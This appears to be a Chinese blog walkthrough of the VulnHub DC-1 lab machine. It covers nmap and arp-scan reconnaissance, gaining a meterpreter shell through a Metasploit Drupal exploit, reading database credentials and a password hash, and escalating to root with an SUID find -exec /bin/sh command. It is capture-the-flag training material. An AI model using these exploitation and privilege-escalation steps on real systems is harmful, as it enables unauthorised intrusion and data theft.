DC系列:dc-1(渗透过程)

目录

信息收集

主机发现

端口信息

网站信息

漏洞扫描

漏洞利用

渗透过程

flag1

flag2

flag3

flag4

权限提升

flag5


下载地址:

DC: 1 ~ VulnHub

信息收集

靶机界面

确认攻击机与dc-1在同一网段,查看mac地址

主机发现

查看靶机IP

sudo arp-scan -l

详细扫描端口信息

sudo nmap -A -p- -sS -sC -T4 10.4.7.144

端口信息

22/tcpopensshOpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcpopenhttpApache httpd 2.2.22 ((Debian))
111/tcpopenrpcbind2-4 (RPC #100000)
41771/tcpopenstatus1 (RPC #100024)

这边可以看到靶机的22 80 111和51771端口是开放的

网站信息

访问下dc-1网页

Drupal是一种开源的内容管理系统

用msf查找下DRupal的漏洞

漏洞扫描

进入msf

msfconsole

 搜索drupal的漏洞

search drupal

通过该模块,攻击者可以利用漏洞执行远程命令,进而控制受影响的Drupal网站。

切换到该模块

use 1

查看漏洞信息

show options

漏洞利用

用set命令设置rhosts文件,指定靶机的ip地址

set rhosts 10.4.7.144

 然后exploit进行攻击

成功后会获得一个meterpreter的shell

(meterpreter它是一种轻量级的后门程序,可用于远程访问受攻击系统,执行各种操作和操纵受感染的主机。)

渗透过程

pwd 查看当前所在我路径

ls 查看所在路径的文件

flag1

可以看到这边有个flag1.txt的文件

看下里面的内容

这边提示要去找CMS中的一个配置文件

shell(以靶机用户的身份运行靶机)

这边可以开启python交互式看的比较舒服

python -c "import pty;pty.spawn( '/bin/bash')" 

这边也没什么有用信息

直接去找他的配置文件

find ./ -name "*settings*" 

flag2

查看一下这个默认文件

看到了flag2文件,flag2中提示我们暴力破解不可取并且需要提权。

还有一个名为drupaldb的数据库,然后我们登录一下这个数据库,查看其中的内容。

database(数据库)=drupaldb(名称)

username(用户名)=dbuser(数据库用户名)

password(密码)=R0ck3t

登入数据库

mysql -udbuser -pR0ck3t

查看当前数据库

show databases;

切换到drupaldb

use drupaldb;

查看当前数据库的表

show tables;

这边有个users表,里面应该是存储网站注册用户的信息表

看一下

select*from users;

表中用户名的密码是加密的,数据库大部分加密方式是cmd5加密方式

$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

在网页找个解码器解码

登录网站试一下

flag3

登录成功,看下有什么有用信息

这边flag3提示要用find提权

flag4

回到终端find下flag4

find / -name "*flag*"

看下里面有什么

cat /home/flag4/flag4.txt

想让我们找到一个find的文件,可能是最后一个flag

看一下SUID可执行的文件

find / -perm -u=s -type f 2>/dev/null

在/usr/bin/下有个find文件

看下这个文件

这边显示当前用户没有权限查看该文件

权限提升

flnd提权

mkdir ymmy
find ymmy -exec 'whoami' \;
root
find ymmy -exec '/bin/bash' \;
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
find ymmy -exec '/bin/sh' \;
id
uid=33(www-data) gid=33(www-data) euid=0(root)groups=0(root),33(www-data)

提权过程

find 命令结合 -exec 参数来执行不同的命令

-exec:对匹配的文件执行该参数所给出的shell命令。形式为command {} ;。

1.find ymmy -exec 'whoami' \;:这个命令尝试在 ymmy目录下执行 whoami 命令,结果显示当前是 root 用户。

2.find ymmy -exec '/bin/bash' \;:这个命令尝试在 ymmy 目录下执行 /bin/bash 命令。然后,使用了 id 命令来查看当前用户的身份信息,结果显示您是以 www-data 用户身份执行的

3.find ymmy -exec '/bin/sh' \;:这个命令尝试在 ymmy"目录下执行 /bin/sh 命令。然后,您再次使用了 id 命令来查看当前用户的身份信息,结果显示您以 root 用户身份执行了 /bin/sh 命令。

flag5

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值